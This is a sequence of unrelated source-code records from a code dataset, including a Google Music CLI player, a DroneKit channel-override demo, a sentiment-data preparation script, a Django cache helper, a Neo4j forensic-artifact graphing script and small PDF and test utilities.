streaming.\"\"\"\n if os.path.exists(\"./device_id\"):\n with open(\"device_id\") as id_file:\n device_id = id_file.read().strip()\n return device_id\n else:\n api = gmusicapi.Webclient()\n api.login(username, password)\n devices = api.get_registered_devices()\n for device in devices:\n if device['type'] == 'PHONE':\n return str(device['id'])[2:]\n with open(\"device_id\", \"w\") as id_file:\n id_file.write(str(device['id']))\n\n\nclass TextMenu:\n def __init__(self, list_items):\n self.list_items = list_items\n def show(self):\n for i, s in enumerate(self.list_items):\n orig_data = [s['title'], s['artist'], s['album']]\n data = [str(strip_accents(tag)) for tag in orig_data]\n print(\"{}. {} - {} - {}\".format(str(i+1), *data))\n while True:\n try:\n return self.list_items[int(raw_input(\"Choice: \")) - 1]\n except ValueError:\n continue\n\n\nclass Player:\n def __init__(self, username, password):\n self.device_id = get_device_id(username, password)\n self.username = username\n self.password = password\n self.api = gmusicapi.Mobileclient()\n self.logged_in = self.api_login()\n self.stream_player = StreamPlayer(self)\n self.stream_player.play()\n self.paused = False\n self.playlist = []\n self.pl_pos = 0\n if self.logged_in:\n print(\"Logged in successfully!\")\n else:\n print(\"Login failed.\")\n quit()\n self.get_random_song()\n\n def player_thread(self):\n bus = self.stream_player._player.get_bus()\n try:\n bus.add_signal_watch()\n bus.connect(\"message\", self.handle_song_end)\n except:\n print(\"Big thing\")\n glib.MainLoop().run()\n\n def beginloop(self):\n self.play_song()\n thread.start_new_thread(self.player_thread, ())\n \n while True:\n os.system('setterm -cursor off')\n self.display_song()\n user_key = getch()\n if user_key == \" \":\n self.paused = not self.paused\n self.stream_player.toggle()\n elif user_key == \"z\":\n self.get_random_song()\n self.pl_pos += 1\n self.play_song()\n elif user_key == \">\":\n self.next_song()\n elif user_key == \"<\":\n self.previous_song()\n elif user_key == \"Q\":\n break\n elif user_key == \"a\":\n self.search_library(\"add\")\n elif user_key == \"s\":\n self.search_library(\"play\")\n elif user_key == \"c\":\n self.clear_playlist()\n\n\n def clear_playlist(self):\n self.playlist = [self.song]\n self.pl_pos = 0\n\n def handle_song_end(self, bus, message):\n if message.type == Gst.MessageType.EOS:\n self.next_song()\n self.display_song() # refresh\n\n def next_song(self):\n self.pl_pos += 1\n try:\n self.song = self.playlist[self.pl_pos]\n self.play_song()\n except IndexError:\n self.pl_pos -= 1\n\n def previous_song(self):\n if self.pl_pos > 0:\n self.pl_pos -= 1\n self.song = self.playlist[self.pl_pos]\n self.play_song()\n\n def search_library(self, action=\"play\"):\n try:\n # Screw x-compatibility.\n os.system('setterm -cursor on')\n search_text = raw_input(\"\\nSearch: \")\n os.system('setterm -cursor off')\n except (EOFError, KeyboardInterrupt):\n return\n matching_songs = []\n for song in self.api.get_all_songs():\n if any([search_text.lower() in song['title'].lower(),\n search_text.lower() in song['artist'].lower(),\n # search_text.lower() in song['album'].lower()s\n ]):\n matching_songs.append(song)\n \n if not matching_songs:\n sys.stdout.write(\"\\rNo results found. \")\n sys.stdout.flush()\n sleep(MESSAGE_TIMEOUT)\n return\n self.playlist.append(TextMenu(matching_songs).show())\n if action == \"play\":\n self.song = self.playlist[-1]\n self.pl_pos = len(self.playlist) - 1\n self.play_song()\n # self.song = matching_songs[1]\n # self.play_song()\n\n def search_all_access(self):\n try:\n # Screw x-compatibility.\n os.system('setterm -cursor on')\n search_text = raw_input(\"\\nSearch: \")\n os.system('setterm -cursor off')\n except (EOFError, KeyboardInterrupt):\n return\n matching_songs = self.api.search_all_access(search_text)\n if not matching_songs:\n sys.stdout.write(\"\\rNo results found. \")\n sys.stdout.flush()\n sleep(MESSAGE_TIMEOUT)\n return\n self.playlist.append(TextMenu(matching_songs).show()) # FIXME\n # self.song = matching_songs[1]\n # self.play_song()\n\n\n def display_song(self):\n if not self.paused:\n try:\n s = unicode(\"\\r[Playing] {s[title]} by {s[artist]}\".format(\n s=self.song))\n except UnicodeEncodeError:\n global strip_accents\n # Don't remove this, I know it doesn't make sense but the code\n # breaks without it there. \n s = \"\\r[Playing] {} by {}\".format(\n strip_accents(self.song['title']),\n strip_accents(self.song['artist']))\n else:\n try:\n s = unicode(\"\\r[Paused] {s[title]} by {s[artist]}\".format(\n s=self.song))\n except UnicodeEncodeError:\n import unicodedata\n def strip_accents(s):\n return ''.join(c for c in unicodedata.normalize('NFD', s) \n if unicodedata.category(c) != 'Mn')\n s = \"\\r[Paused] {} by {}\".format(\n strip_accents(self.song['title']),\n strip_accents(self.song['artist']))\n s += \" \" * (int(term_width()) - len(s) - 1)\n sys.stdout.write(s)\n sys.stdout.flush()\n\n\n def api_login(self):\n return self.api.login(self.username, self.password)\n\n def play_url(self, stream_url):\n self.stream_player.change_song(stream_url)\n self.stream_player.play()\n\n def get_random_song(self):\n all_songs = self.api.get_all_songs()\n self.song = random.choice(all_songs)\n self.playlist.append(self.song)\n\n def play_song(self):\n song_url = self.api.get_stream_url(self.song['id'], self.device_id)\n self.play_url(song_url)\n\n\ndef disable_warnings():\n import requests.packages.urllib3 as urllib3\n urllib3.disable_warnings()\n\n\ndef main():\n disable_warnings()\n while True:\n username = raw_input(\"Username: \")\n # # notify(\"A password is required to use Google Music.\")\n password = getpass()\n try:\n player = Player(username, password)\n player.beginloop()\n except gmusicapi.exceptions.NotLoggedIn:\n print(\"Login details were incorrect or Google blocked a login \" +\n \"attempt. Please check your email.\")\n else:\n break\n os.system('setterm -cursor on')\n print\n\n\nif __name__ == \"__main__\":\n # Implement single-character grabbing from stdin.\n try:\n from msvcrt import getch\n except ImportError:\n getch = GetchUnix()\n try:\n main()\n except Exception:\n os.system(\"setterm -cursor on\")\n raise","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":9870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"287422614","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n© Copyright 2015-2016, 3D Robotics.\n\nchannel_overrides.py: \n\nDemonstrates how set and clear channel-override information.\n\n# NOTE: \nChannel overrides (a.k.a \"RC overrides\") are highly discommended (they are primarily implemented \nfor simulating user input and when implementing certain types of joystick control).\n\nThey are provided for development purposes. Please raise an issue explaining why you need them\nand we will try to find a better alternative: https://github.com/dronekit/dronekit-python/issues\n\nFull documentation is provided at http://python.dronekit.io/examples/channel_overrides.html\n\"\"\"\nfrom __future__ import print_function\nfrom dronekit import connect, VehicleMode, LocationGlobalRelative\nimport time\n\nimport signal\nimport sys\n\ndef signal_handler(sig, frame):\n print('You pressed Ctrl+C!')\n while vehicle.armed:\n vehicle.armed = False\n\n vehicle.close()\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n#Set up option parsing to get connection string\nimport argparse \nparser = argparse.ArgumentParser(description='Example showing how to set and clear vehicle channel-override information.')\nparser.add_argument('--connect', \n help=\"vehicle connection target string. If not specified, SITL automatically started and used.\")\nparser.add_argument('--manual', \n help=\"Setup the sequence in manual mode, otherwise stabilize\")\nargs = parser.parse_args()\n\nconnection_string = args.connect\nmanual_mode = False\nif args.manual:\n manual_mode = True\n\n# Connect to the Vehicle\nprint('Connecting to vehicle on: %s' % connection_string)\nvehicle = connect(connection_string, wait_ready=False)\n\ntime.sleep(10)\n\nprint(\"Starting\")\nif manual_mode:\n print(\"Using manual mode\")\n vehicle.mode = VehicleMode(\"MANUAL\")\nelse:\n print(\"Using stabilize mode\")\n vehicle.mode = VehicleMode(\"STABILIZE\")\n\nvehicle.armed = True\n# Confirm vehicle armed before attempting to take off\nwhile not vehicle.armed:\n print(\" Waiting for arming...\")\n time.sleep(0.1)\n\n# Override channels\nprint(\"\\nChannel overrides: %s\" % vehicle.channels.overrides)\n\n#vehicle.wait_ready(True)\n\nv = 200\ndef pwm(channel, direction):\n return {channel : 1500 + (v * direction)}\n\n#UP = pwm('3', -1)\n#DOWN = pwm('3', 1)\n#FORWARD = pwm('4', 1)\n#BACKWARD = pwm('4', -1)\n#RIGHT = pwm('5', 1)\n#LEFT = pwm('5', -1)\n\nAVANCE = 1\nDROITE = 2\nBAS = 3\n\nNORMAL = 1\nREVERSE = -1\n\ndef print_action(a, direction):\n if a == AVANCE:\n print(\"going forward\")\n if a == DROITE:\n print(\"going right\")\n if a == BAS:\n print(\"going down\")\n print(direction)\n\n\ndef action(a, direction, t):\n print_action(a, direction)\n for i in range(t * 100):\n if not vehicle.armed:\n vehicle.armed = True\n if a == AVANCE:\n vehicle.channels.overrides['5'] = 1500 + (v * direction)\n if a == DROITE:\n vehicle.channels.overrides['4'] = 1500 + (v * direction)\n if a == BAS:\n vehicle.channels.overrides['3'] = 1500 + (v * direction)\n time.sleep(1. / 100)\n reset()\n\ndef reset():\n vehicle.channels.overrides['3'] = 1500\n vehicle.channels.overrides['4'] = 1500\n vehicle.channels.overrides['5'] = 1500\n time.sleep(1.)\n\nreset()\n \n#------------- START SEQUENCE\n#action(BAS, REVERSE, 1) # Descend\naction(AVANCE, NORMAL, 12) # Avance\naction(DROITE, NORMAL, 2) # Gauche\naction(AVANCE, NORMAL, 12) # Avance\naction(DROITE, REVERSE, 2) # Droite\naction(AVANCE, NORMAL, 12) # Avance\n#action(BAS, NORMAL, 5) # Monte\n#------------- END SEQUENCE\nreset()\nreset()\nreset()\n\nwhile vehicle.armed:\n vehicle.armed = False\n\ntime.sleep(2)\n\n#Close vehicle object before exiting script\nprint(\"\\nClose vehicle object\")\nvehicle.close()\n\n\nprint(\"Completed\")\n","sub_path":"test/channel_overrides.py","file_name":"channel_overrides.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"390453174","text":"\"\"\"\n70. データの入手・整形\n文に関する極性分析の正解データを用い,\n以下の要領で正解データ(sentiment.txt)を作成せよ.\n\nrt-polarity.posの各行の先頭に\"+1 \"という文字列を追加する\n(極性ラベル\"+1\"とスペースに続けて肯定的な文の内容が続く)\n\nrt-polarity.negの各行の先頭に\"-1 \"という文字列を追加する\n(極性ラベル\"-1\"とスペースに続けて否定的な文の内容が続く)\n\n上述1と2の内容を結合(concatenate)し,行をランダムに並び替える\n\nsentiment.txtを作成したら,\n正例(肯定的な文)の数と負例(否定的な文)の数を確認せよ.\n\"\"\"\nimport random\n\nall_content_list = []\nwith open('data/rt-polaritydata/rt-polarity.pos') as f1:\n for line in f1:\n all_content_list.append('+1' + '\\t' + line)\n\nwith open('data/rt-polaritydata/rt-polarity.neg') as f2:\n for line in f2:\n all_content_list.append('-1' + '\\t' + line)\n\n\nrandom.shuffle(all_content_list)\nf = open('data/sentiment.txt', 'w')\nfor line in all_content_list:\n f.write(line)\nf.close()\n\npos_counter = 0\nneg_counter = 0\nwith open('data/sentiment.txt', encoding='utf-8') as f:\n for line in f:\n content_list = line.split()\n if content_list[0] == '+1':\n pos_counter += 1\n if content_list[0] == '-1':\n neg_counter += 1\n\nprint('+1 size is ' + str(pos_counter))\nprint('-1 size is ' + str(neg_counter))\n","sub_path":"NLP_100knock/chapter8/70.py","file_name":"70.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"16187419","text":"import os\n\n\ndef file_handle(array, func_type, res=None):\n if func_type == query:\n with open('文件.conf', 'r', encoding='utf-8') as read_f:\n tag = False\n res = []\n for item in read_f:\n # 文件里字符串左右两边有什么空格,\\n,\\t符号要除掉在比较\n if item.strip() == 'backend %s' % array: # 文件在backend 和后面的内容直接有空格\n tag = True\n continue\n if tag and item.startswith('backend'):\n break\n if tag:\n print('\\033[35m%s\\033[0m' % item, end='')\n res.append(item)\n return res\n if func_type == change:\n with open('文件.conf', 'r') as read_f, \\\n open('new_文件.conf', 'w') as write_f:\n tag = False\n tag1 = True\n for item in read_f:\n if item.strip() == array: # 找到文件 backend www.hjc1.org 这一行\n tag = True # 改变tag的状态\n continue # 继续读下一行\n\n if tag: # 修改的数据在 backend www.hjc1.org 的下一行可以开始操作\n if tag1:\n res.insert(0, '%s\\n' % array) # res里面没有 backend www.hjc1.org ,自己加上去,\n for record in res: # 循环已经改好的 backend www.hjc1.org,一行一行读取\n write_f.write(record) # 一行写入一个新文件中\n tag1 = False\n\n if tag and item.startswith('backend'):\n tag = False\n if not tag: # 没有找到 backend www.hjc1.org 就把文件的内容一行一行写到新文件中\n write_f.write(item)\n os.remove('文件.conf') # 删除原文件\n os.rename('new_文件.conf', '文件.conf') # 修改的文件名改成原文件名\n return res\n\n\ndef add():\n print('\\033[34;4m 欢迎进入查询功能\\033[0m')\n pass\n\n\ndef delete():\n print('\\033[33;4m 欢迎进入查询功能\\033[0m')\n pass\n\n\ndef change(array):\n print('\\033[32;4m 欢迎进入修改功能\\033[0m')\n backend = array[0]['backend'] # 得倒www.hjc1。org\n backend_data = 'backend %s' % backend # 得到 backend www.hjc1.org\n old_record = '%sserver %s %s weight %s max %s\\n' % ( # 单词写错,悔恨终身\n ' ' * 4,\n array[0]['record']['server'],\n array[0]['record']['server'],\n array[0]['record']['weight'],\n array[0]['record']['max'],\n )\n new_record = '%sserver %s %s weight %s max %s\\n' % (\n ' ' * 4,\n array[1]['record']['server'],\n array[1]['record']['server'],\n array[1]['record']['weight'],\n array[1]['record']['max'],\n )\n res = query(backend) # 得到query函数的返回值,并且赋值给res\n if not res or old_record not in res: # 如果查询返回的值是空的或者你要改的记录不在赶回值里面\n print('想要修改的值不在文件里')\n else:\n count = res.index(old_record) # 超着要改的记录在返回的列表中的索引位置\n res[count] = new_record # 把改好的值赋给返回列表中对应的要改的值\n\n return file_handle(backend_data, func_type=change, res=res)\n\n\ndef query(array):\n print('\\033[31;4m 欢迎进入查询功能\\033[0m')\n\n return file_handle(array, func_type=query)\n\n\nif __name__ == '__main__':\n msg = \"\"\" 有以下功能:\n 1: \"增加\",\n 2: '删除',\n 3: '修改',\n 4: '查询',\n ('q', 'Q'): '退出'\n \"\"\"\n msg_func = {\n '1': add,\n '2': delete,\n '3': change,\n '4': query,\n }\n # 下面是需要修改的数据和改好的数据\n my = [{'backend': 'www.hjc1.org', 'record': {'server': '10.10.70', 'weight': 20, 'max': 30}},\n {'backend': 'www.hjc1.org', 'record': {'server': '1.1.7', 'weight': 2, 'max': 3}}]\n while True:\n print(msg, sep='\\n')\n choice = input('请选择你想要的功能:').strip()\n if not choice:\n continue\n if choice.upper() == 'Q':\n break\n data = input('请输入你想操作的数据:').strip()\n if choice != '4':\n data = eval(data)\n ret = msg_func[choice](data)\n print('\\033[45m这是返回值\\033[0m:', ret)\n\n","sub_path":"code/Day21/decopled_程序的解藕.py","file_name":"decopled_程序的解藕.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"540658045","text":"from django.db.models.signals import m2m_changed, post_delete, post_save\nfrom django_redis import get_redis_connection\n\nfrom .utils import invalid_cache, CACHEME, CACHEME_DICT\n\nfrom cacheme import cacheme as BaseCacheMe\n\n\nclass CacheMe(BaseCacheMe):\n\n def collect_sources(self):\n models = self.kwargs.get('invalid_models', [])\n m2m_models = self.kwargs.get('invalid_m2m_models', [])\n results = set()\n\n for model in models:\n model.signal_type = 'ONE'\n results.add(model)\n\n for model in m2m_models:\n model.signal_type = 'M2M'\n results.add(model)\n return results\n\n def connect(self, model):\n if model.signal_type == 'ONE':\n post_save.connect(invalid_cache, model)\n post_delete.connect(invalid_cache, model)\n\n if model.signal_type == 'M2M':\n post_save.connect(invalid_cache, model)\n post_delete.connect(invalid_cache, model)\n m2m_changed.connect(invalid_cache, model)\n\n\nredis_connection = get_redis_connection(CACHEME.REDIS_CACHE_ALIAS)\nCacheMe.set_connection(redis_connection)\nCacheMe.update_settings(CACHEME_DICT)\n","sub_path":"django_cacheme/cache_model.py","file_name":"cache_model.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"294985119","text":"\"\"\"add nexapi\n\nRevision ID: cd89a8474017\nRevises: 51f5ccfba190\nCreate Date: 2017-07-19 10:17:38.371924\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'cd89a8474017'\ndown_revision = '51f5ccfba190'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('nex_api_case',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=True),\n sa.Column('desc', sa.String(length=100), nullable=True),\n sa.Column('url', sa.String(length=100), nullable=True),\n sa.Column('request_type', sa.String(length=100), nullable=True),\n sa.Column('request_data', sa.Text(), nullable=True),\n sa.Column('expectation', sa.String(length=1000), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('nex_api_case')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/cd89a8474017_add_nexapi.py","file_name":"cd89a8474017_add_nexapi.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"640714532","text":"from py2neo import Graph, Node, Relationship\r\nimport pandas as pd\r\n\r\n\r\n# MATCH (u:User)-[r]-(b)-[r2]-(c) WHERE c.file_extension = '.py' OR c.url CONTAINS 'python' RETURN u,r,b,r2,c\r\n\r\nswInstallPath = \"extracted_data\\\\PsCSV\\\\SoftwareInstalled.csv\"\r\nmruPath = \"extracted_data\\\\PsCSV\\\\mru.csv\"\r\n\r\nchromeBookmarkPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\chromeBookmarks.csv\"\r\nchromeDownloadPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\chromeDownloads.csv\"\r\nchromeHistoryPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\chromeHistory.csv\"\r\nfirefoxBookmarkPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\mozillaBookmarks.csv\"\r\nfirefoxeDownloadPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\mozillaDownloads.csv\"\r\nfirefoxHistoryPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\mozillaHistory.csv\"\r\nieBookmarkPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\ieBookmarks.csv\"\r\nieHistoryPath = \"extracted_data\\\\History-5,11,2019,1,32,51,PM\\\\ieHistory.csv\"\r\n\r\nfileExPath = \"extracted_data\\\\fileCSV\\\\getall.csv\"\r\n\r\nuserAcc = \"WeiHan The Analyst\"\r\n\r\nclass MainNode:\r\n def __init__(self):\r\n self.components = []\r\n\r\n def add_component(self, regComp):\r\n self.components.append(regComp)\r\n\r\nclass RegSW:\r\n def __init__(self):\r\n self.softwares = []\r\n\r\n def add_swobj(self, swI):\r\n self.softwares.append(swI)\r\n\r\nclass RegMRU:\r\n def __init__(self):\r\n self.mru = []\r\n\r\n def add_mru(self, recentItem):\r\n self.mru.append(recentItem)\r\n\r\nclass FireChrome:\r\n def __init__(self):\r\n self.history = []\r\n self.bookmarks = []\r\n self.downloads = []\r\n\r\n def add_history(self, hist):\r\n self.history.append(hist)\r\n\r\n def add_bookmarks(self, bookm):\r\n self.bookmarks.append(bookm)\r\n\r\n def add_downloads(self, downl):\r\n self.downloads.append(downl)\r\n\r\nclass IntExplorer:\r\n def __init__(self):\r\n self.history = []\r\n self.bookmarks = []\r\n\r\n def add_history(self, hist):\r\n self.history.append(hist)\r\n\r\n def add_bookmarks(self, bookm):\r\n self.bookmarks.append(bookm)\r\n\r\nclass CompFiles:\r\n def __init__(self):\r\n self.files = []\r\n\r\n def add_files(self, extractedFiles):\r\n self.files.append(extractedFiles)\r\n\r\nclass SoftwareInstalled:\r\n def __init__(self, swName, swVersion, swPublisher, swInstallDate):\r\n self.name = swName\r\n self.version = swVersion\r\n self.publisher = swPublisher\r\n self.installDate = swInstallDate\r\n\r\nclass History:\r\n def __init__(self, url, title):\r\n self.url = url\r\n self.title = title\r\n\r\nclass IEHistory:\r\n def __init__(self, url):\r\n self.url = url\r\n\r\nclass Bookmarks:\r\n def __init__(self, url, title):\r\n self.url = url\r\n self.title = title\r\n\r\nclass Downloads:\r\n def __init__(self, name, source):\r\n self.name = name\r\n self.source = source\r\n\r\nclass ExFiles:\r\n def __init__(self, name, time, fullpath, size, hexsig, extn, magicmatch):\r\n self.name = name\r\n self.dateTime = time\r\n self.fullPath = fullpath\r\n self.sizeKB = size\r\n self.hexSig = hexsig\r\n self.extn = extn\r\n self.magicmatch = magicmatch\r\n\r\nclass DFGraph:\r\n def __init__(self):\r\n self.graph = Graph(password=\"ict2202\")\r\n self.graph.delete_all()\r\n self.transaction = self.graph.begin()\r\n\r\n def clear_graph(self):\r\n self.graph.delete_all()\r\n\r\n def add_node(self, node):\r\n self.transaction.create(node)\r\n\r\n def add_relationship(self, relation):\r\n self.transaction.create(relation)\r\n\r\n def commit_tx(self):\r\n self.transaction.commit()\r\n\r\ndef registryGraph():\r\n registry = MainNode()\r\n regSW = RegSW()\r\n regMRU = RegMRU()\r\n swdf = pd.read_csv(swInstallPath)\r\n for index, row in swdf.iterrows():\r\n regSW.add_swobj(SoftwareInstalled(row['DisplayName'], row['DisplayVersion'], row['Publisher'], row['InstallDate']))\r\n mrudf = pd.read_csv(mruPath)\r\n for index, row in mrudf.iterrows():\r\n regMRU.add_mru(row['MRU'])\r\n registry.add_component(regSW)\r\n registry.add_component(regMRU)\r\n return registry\r\n\r\ndef browserGraph():\r\n browser = MainNode()\r\n chrome = FireChrome()\r\n firefox = FireChrome()\r\n ie = IntExplorer()\r\n chromeBookdf = pd.read_csv(chromeBookmarkPath, encoding = 'unicode_escape')\r\n for index, row in chromeBookdf.iterrows():\r\n chrome.add_bookmarks(Bookmarks(row['URL'], row['Title']))\r\n chromeHistdf = pd.read_csv(chromeHistoryPath, encoding = 'unicode_escape')\r\n for index, row in chromeHistdf.iterrows():\r\n chrome.add_history(History(row['URL'], row['Title']))\r\n chromeDldf = pd.read_csv(chromeDownloadPath, encoding = 'unicode_escape')\r\n for index, row in chromeDldf.iterrows():\r\n chrome.add_downloads(Downloads(row['Name'], row['Source']))\r\n ffBookdf = pd.read_csv(firefoxBookmarkPath, encoding = 'unicode_escape')\r\n for index, row in ffBookdf.iterrows():\r\n firefox.add_bookmarks(Bookmarks(row['URL'], row['Title']))\r\n ffHistdf = pd.read_csv(firefoxHistoryPath, encoding = 'unicode_escape')\r\n for index, row in ffHistdf.iterrows():\r\n firefox.add_history(History(row['URL'], row['Title']))\r\n ffDldf = pd.read_csv(firefoxeDownloadPath, encoding = 'unicode_escape')\r\n for index, row in ffDldf.iterrows():\r\n firefox.add_downloads(Downloads(row['Name'], row['Source']))\r\n ieBookdf = pd.read_csv(ieBookmarkPath, encoding = 'unicode_escape')\r\n for index, row in ieBookdf.iterrows():\r\n ie.add_bookmarks(Bookmarks(row['URL'], row['Title']))\r\n ieHistdf = pd.read_csv(ieHistoryPath, encoding = 'unicode_escape')\r\n for index, row in ieHistdf.iterrows():\r\n ie.add_history(IEHistory(row['URL']))\r\n browser.add_component(chrome)\r\n browser.add_component(firefox)\r\n browser.add_component(ie)\r\n return browser\r\n\r\ndef fileGraph():\r\n fileAnalysis = MainNode()\r\n compFiles = CompFiles()\r\n exFilesdf = pd.read_csv(fileExPath)\r\n for index, row in exFilesdf.iterrows():\r\n compFiles.add_files(ExFiles(row['Title'], row['Time'], row['FullPath'], row['LengthInKB'], row['HexSignature'], row['FileExtn'], row['Result']))\r\n fileAnalysis.add_component(compFiles)\r\n return fileAnalysis\r\n\r\nif __name__ == \"__main__\":\r\n graph = DFGraph()\r\n user = Node(\"User\", name=userAcc)\r\n graph.add_node(user)\r\n\r\n registry = registryGraph()\r\n swReg = Node(\"Registry\", name=\"Software Installed\")\r\n mruReg = Node(\"Registry\", name=\"Most Recently Used\")\r\n graph.add_node(Relationship(user, \"Digital Traces By\", swReg))\r\n graph.add_node(Relationship(user, \"Digital Traces By\", mruReg))\r\n for softwares in registry.components[0].softwares:\r\n graph.add_node(Relationship(swReg, \"Extracted Info\", Node(\"Softwares\", name=softwares.name, version=softwares.version, publisher=softwares.publisher, install_date = softwares.installDate)))\r\n for index, mru in enumerate(registry.components[1].mru):\r\n graph.add_node(Relationship(mruReg, \"Extracted Info\", Node(\"MRU\", name=mru, used_order=index+1)))\r\n\r\n browser = browserGraph()\r\n chrome = Node(\"Browser\", name=\"Chrome\")\r\n firefox = Node(\"Browser\", name=\"Firefox\")\r\n ie = Node(\"Browser\", name=\"Internet Explorer\")\r\n graph.add_node(Relationship(user, \"Digital Traces By\", chrome))\r\n graph.add_node(Relationship(user, \"Digital Traces By\", firefox))\r\n graph.add_node(Relationship(user, \"Digital Traces By\", ie))\r\n for history in browser.components[0].history:\r\n graph.add_node(Relationship(chrome, \"Visits\", Node(\"History\", url=history.url, title=history.title)))\r\n for download in browser.components[0].downloads:\r\n graph.add_node(Relationship(chrome, \"Downloads\", Node(\"Downloads\", name=download.name, source=download.source)))\r\n for bookmark in browser.components[0].bookmarks:\r\n graph.add_node(Relationship(chrome, \"Favourites\", Node(\"Bookmarks\", url=bookmark.url, title=bookmark.title)))\r\n for history in browser.components[1].history:\r\n graph.add_node(Relationship(firefox, \"Visits\", Node(\"History\", url=history.url, title=history.title)))\r\n for download in browser.components[1].downloads:\r\n graph.add_node(Relationship(firefox, \"Downloads\", Node(\"Downloads\", name=download.name, source=download.source)))\r\n for bookmark in browser.components[1].bookmarks:\r\n graph.add_node(Relationship(firefox, \"Favourites\", Node(\"Bookmarks\", url=bookmark.url, title=bookmark.title)))\r\n for history in browser.components[2].history:\r\n graph.add_node(Relationship(ie, \"Visits\", Node(\"History\", url=history.url)))\r\n for bookmark in browser.components[2].bookmarks:\r\n graph.add_node(Relationship(ie, \"Favourites\", Node(\"Bookmarks\", url=bookmark.url, title=bookmark.title)))\r\n\r\n fileAnalysis = fileGraph()\r\n sysFile = Node(\"Files in System\", name=\"User Files\")\r\n graph.add_node(Relationship(user, \"Digital Traces By\", sysFile))\r\n for files in fileAnalysis.components[0].files:\r\n graph.add_node(Relationship(sysFile, \"Contains\", Node(\"Files\", name=files.name, date_time_accessed=files.dateTime, full_path=files.fullPath, size_KB=files.sizeKB, hex_signature=files.hexSig, file_extension=files.extn, magic_number_match=files.magicmatch)))\r\n\r\n graph.commit_tx()\r\n","sub_path":"ProjectGUI/userProfiling.py","file_name":"userProfiling.py","file_ext":"py","file_size_in_byte":9368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557892354","text":"import os\n\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\n\npath = \"../../practice_files\"\n\ninput_file_path = os.path.join(path, 'ugly.pdf')\noutput_file_path = os.path.join(os.curdir, 'output')\n\nif not os.path.exists(output_file_path):\n os.mkdir('output')\n\ninput_pdf = PdfFileReader(input_file_path)\noutput_pdf = PdfFileWriter()\n\nnum_pages = input_pdf.getNumPages()\nfor n in range(0, num_pages):\n page = input_pdf.getPage(n)\n if n % 2 == 0:\n page.rotateClockwise(90)\n output_pdf.addPage(page)\n\nwith open(os.path.join(output_file_path, 'The Conformed Duckling.pdf'), 'wb') as pdf_file:\n output_pdf.write(pdf_file)","sub_path":"chapters/13/examples/13_2/rotating-pdf-example.py","file_name":"rotating-pdf-example.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"27118006","text":"try:\n from hypothesis import given\n from hypothesis.strategies import (\n integers, floats, booleans, one_of, complex_numbers,\n lists, sets, fractions, text\n )\nexcept ImportError:\n import logging\n logging.error(\n \"'hypothesis' package was not found, so our propery-based tests \"\n \"could not be run.\\n\"\n \"Consider installing the missing package with:\\n\"\n \"\\tpip3 install hypothesis\"\n )\n # replace all strategies with noops to avoid undefined names\n # and make \"given\" skip tests\n from tensorflow_mcmc.tests.property_based.skip_tests import given, noop\n integers = noop\n floats = noop\n booleans = noop\n one_of = noop\n complex_numbers = noop\n lists = noop\n sets = noop\n fractions = noop\n text = noop\n\n\nimport unittest\nfrom tensorflow_mcmc.bayesian_neural_network import generate_batches\n\n\ndef batch_generator(X=None, y=None,\n x_placeholder=None, y_placeholder=None,\n seed=None, batch_size=10):\n return generate_batches(X=X, y=y,\n x_placeholder=x_placeholder,\n y_placeholder=y_placeholder,\n seed=seed,\n batch_size=batch_size)\n\n\ndef random_nonint_input_type_strategy():\n return one_of(\n floats(), booleans(), complex_numbers(),\n lists(integers(), max_size=10), sets(integers(), max_size=10),\n fractions(), text()\n )\n\n\nclass TestInvalidInputs(unittest.TestCase):\n @given(random_nonint_input_type_strategy())\n def test_invalid_input_type_batch_size(self, batch_size):\n self.assertRaises(\n AssertionError,\n lambda: next(batch_generator(batch_size=batch_size))\n )\n\n @given(integers(max_value=0))\n def test_invalid_integer_batch_size(self, batch_size):\n self.assertRaises(\n AssertionError,\n lambda: next(batch_generator(batch_size=batch_size))\n )\n\n @given(random_nonint_input_type_strategy())\n def test_invalid_input_type_seed(self, seed):\n self.assertRaises(\n AssertionError,\n lambda: next(batch_generator(seed=seed))\n )\n","sub_path":"sgmcmc/tensorflow_mcmc/tests/property_based/test_hypothesis_batch_generator.py","file_name":"test_hypothesis_batch_generator.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"598579434","text":"from fraccion import Fraccion\n\ndef carga(i):\n auxnum = int(input(\"ingrese el 